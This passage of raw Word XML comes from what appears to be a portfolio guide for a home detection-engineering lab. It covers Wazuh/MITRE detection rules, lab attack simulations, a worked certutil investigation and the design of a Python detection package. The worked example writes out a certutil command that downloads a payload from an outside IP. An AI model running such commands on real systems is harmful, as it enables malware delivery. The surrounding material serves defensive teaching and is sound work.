            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1565</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Wazuh FIM on /etc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100225</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Wazuh agent stopped/removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1562</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Manager: agent disconnect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100226</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mass file modification (ransomware-like)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FIM: many changes in short window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="X026f6be494c4993a5a20f05de67b0f59729d136"/>
      <w:r>
        <w:t xml:space="preserve">Attack simulations (safe, reversible, lab only)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each simulation exists to generate the telemetry a rule needs. All run on the isolated host-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">network against lab VMs, using well-documented, reversible commands (Atomic Red Team style). No</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">real malware. Snapshot the VM before, restore after.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority set for months one and two: encoded PowerShell, certutil download, whoami/discovery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chain, LOLBIN execution (mshta/regsvr32), SSH brute force with hydra against a lab VM, a Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reverse shell one-liner, and a Windows brute-force then success.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="X8d90ba4020c253b22082abb26ebdf6c2617aa5c"/>
      <w:r>
        <w:t xml:space="preserve">Expected logs and investigation steps (worked example)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">certutil download (bf-0002 / Wazuh 100202), T1105.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What the attacker does:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">certutil.exe -urlcache -split -f http://45.77.12.9/payload.exe a.exe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Attacker sees:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the file downloaded to disk.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Telemetry (Sysmon EventID 1):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Image ends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\certutil.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, CommandLine contains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">urlcache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URL, ParentImage is likely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powershell.exe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Wazuh alert:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rule 100202, level 12, description "Certutil used to download a remote file",</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE T1105, with the source IP available for pivoting.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Investigation steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Is certutil expected on this host for this user? On a workstation, almost never for downloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extract the URL and IP; run reputation lookups (public IP, not private).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check the parent process and what ran after (did the downloaded file execute?).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look for the written file on disk and hash it; pivot the hash across other hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision: if the destination is untrusted and a file executed, contain the host and escalate.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What you would say in an interview:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"certutil is a signed Microsoft binary, a LOLBIN, so it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">blends in. I do not detect the tool, I detect the behavior: the download flags plus an external</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">URL. That keeps false positives low because legitimate certificate use does not use urlcache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">against an external http host."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9" w:name="X0c4618d8ade107a86423a30d2fec90093098f8e"/>
      <w:r>
        <w:t xml:space="preserve">09. Python Software Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The package is small on purpose. You should be able to read every file in an afternoon and explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">any of them in an interview. This section is the map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="package-architecture"/>
      <w:r>
        <w:t xml:space="preserve">Package architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src/blueforge/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  schema.py            The Event model. The contract every other module depends on.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  config.py            Config dataclass loaded from environment variables.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  logging_config.py    One function to set up consistent logging.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  cli.py               click CLI. The glue that runs the pipeline.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  __main__.py          Enables `python -m blueforge`.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  collectors/          Acquire raw logs.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    base.py            Collector ABC with one method: collect() -&gt; Iterator[dict].</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    sample.py          SampleCollector reads JSON Lines.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  normalizer/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    normalize.py       _map_* functions: one per raw format -&gt; Event.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  detections/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    engine.py          Detection, DetectionEngine, load_rules. The documented mini-Sigma.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  enrichment/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ioc.py             extract_iocs(): regex IOC extraction, no network.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    threatintel.py     Optional reputation lookups; degrade to "unknown" without a key.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  reporting/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    incident_report.py build_report(): matches -&gt; Markdown via jinja2.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  utils/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    io.py              read_jsonl, write_text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="key-classes-and-responsibilities"/>
      <w:r>
        <w:t xml:space="preserve">Key classes and responsibilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">schema.Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(pydantic BaseModel).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The single normalized event. Only timestamp, source, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">category are required; everything else is optional so partial logs still validate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">get(field)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lets the detection engine read either a typed attribute or a raw field by name. This one class is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">why detections do not care about log formats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">collectors.base.Collector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(ABC).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Defines the one method every collector implements:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">collect()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Using an abstract base class documents the interface and makes new sources drop-in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">detections.engine.Detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(dataclass).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A loaded rule: id, title, level, MITRE list, log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">source category, matchers, condition. Built from a YAML dict via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">from_dict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detections.engine.DetectionEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Holds the loaded rules and exposes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">evaluate(event) -&gt; list[Match]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The matching logic is deliberately simple and fully documented: for each rule, check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the log-source category, evaluate each</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">field|operator: values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">matcher (equals/contains/starts/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ends, case-insensitive), then combine with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all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reporting.incident_report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A jinja2 template plus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">build_report(matches)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Format lives in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">template, logic in the function. The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filter pulls IOCs into the report automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="interfaces-and-data-flow"/>
      <w:r>
        <w:t xml:space="preserve">Interfaces and data flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The whole system is three interfaces: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Collector.collect() -&gt; Iterator[dict]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(raw records).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normalize(dict) -&gt; Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(the contract boundary).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DetectionEngine.evaluate(Event) -&gt; list[Match]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(findings).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Everything downstream (enrichment, reporting, hunting) consumes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. Because the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">boundaries are typed, each stage is unit-testable in isolation, which is exactly what the test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">suite does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="testing-approach"/>
      <w:r>
        <w:t xml:space="preserve">Testing approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73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Unit tests per module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, using the small synthetic logs in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as fixtures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The normalizer and the engine get the most tests because they are the contract and the core.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests assert behavior a reviewer cares about: benign events do not fire rules, casing does not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">evade detection, every rule is MITRE-mapped, private IPs are not treated as public IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target: keep the suite fast (under a second) so it runs on every commit via pre-commit and CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="coding-standards"/>
      <w:r>
        <w:t xml:space="preserve">Coding standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type hints everywhere;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">from __future__ import annotations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for clean modern syntax.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ruff for lint + format, mypy for types. Both run in CI and pre-commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docstrings explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not just</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">what</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, because this codebase is also a teaching artifact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Small functions, single responsibility, no cleverness that you cannot explain out loud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secrets only from environment variables. No network calls in the core path. Fail gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="what-was-deliberately-left-out-and-why"/>
      <w:r>
        <w:t xml:space="preserve">What was deliberately left out (and why)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No database (files + git suffice at this scale). No web UI (the CLI plus Markdown reports are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enough and stay explainable). No async (log volumes here do not need it). No plugin framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(YAGNI). Each omission is a defensible design decision, which is more impressive than an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">over-engineered stack you cannot justify.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6" w:name="X4e5b0b4d73bd0988be0d1e9bae503727a9a2580"/>
      <w:r>
        <w:t xml:space="preserve">10. GitHub Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The repository is run like a real project so the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is part of the portfolio. A reviewer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">looks at issues, milestones, commit messages, and CI to judge whether you work like an engineer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="milestones-one-per-roadmap-phase"/>
      <w:r>
        <w:t xml:space="preserve">Milestones (one per roadmap phase)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 0: Foundation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 1: MVP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 2: Detection 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 3: Threat Hunting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 4: Automation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 5: AI Assistant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 6: v1.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Each issue is assigned to a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">milestone so progress is visible on the milestones page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="labels-defined-in-githublabelsyml"/>
      <w:r>
        <w:t xml:space="preserve">Labels (defined in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/labels.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
